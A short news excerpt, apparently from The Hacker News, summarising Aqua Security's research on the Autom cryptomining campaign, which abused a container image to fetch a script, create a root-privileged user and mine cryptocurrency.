Researchers from DevSecOps and cloud security firm Aqua Security have been tracking the malware operation for the past three years. Initial attacks involved executing a malicious command upon running a vanilla image named “alpine:latest” that resulted in the download of a shell script named “autom.sh” The shell script initiates the attack sequence, enabling the adversary to create a new user account under the name “akay” and upgrade its privileges to a root user, using which arbitrary commands are run on the compromised machine with the goal of mining cryptocurrency.”]
Source: https://thehackernews.com/2021/12/ongoing-autom-cryptomining-malware.html